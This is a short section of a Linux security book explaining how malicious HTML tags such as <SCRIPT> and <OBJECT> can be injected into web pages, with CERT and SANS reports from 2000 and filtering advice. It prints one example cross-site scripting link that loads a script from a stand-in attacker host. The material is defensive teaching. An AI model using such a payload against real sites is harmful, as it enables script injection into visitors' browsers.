Section 11.13 Evil HTML Tags and Script | Real World Linux Security Prentice Hall Ptr Open Source Technology Series

11.13 Evil HTML Tags and Script

graphics/threedangerlevel.gif

In early 2000, the CERT Coordination Center reported that evil HTML tags or script could cause intrusion into the Web browser's computer or even attack other servers. The tags that may be used to do this include <SCRIPT>, <APPLET>, <OBJECT>, and <EMBED>.

Servers should not accept HTML containing these tags from untrusted sources. It would be a very good idea to disable these features in your browser, if possible, for higher security. Of course, this would end all those cool Java hacks. Other tags, such as the <FORM> tag, can also be abused.

A typical exploit would be the following.

 <A HREF="http://pentacorp.com/comment.cgi?mycomment=<SCRIPT src='/books/3/349/1/html/2/http://cracker.com/exploit'></SCRIPT>"> Click for image</A>

Starting with version 4.x Netscape tries to limit these exploits by requiring the URL inside the script to be on the same system as the page in which it appears. Most major sites filter these tags out of any pages that are assembled from data originating outside their site and therefore untrusted.

According to SANS on March 23, 2000, there have been reports that deja.com still was not filtering these possible exploits out of Usenet News postings that it serves up.

Top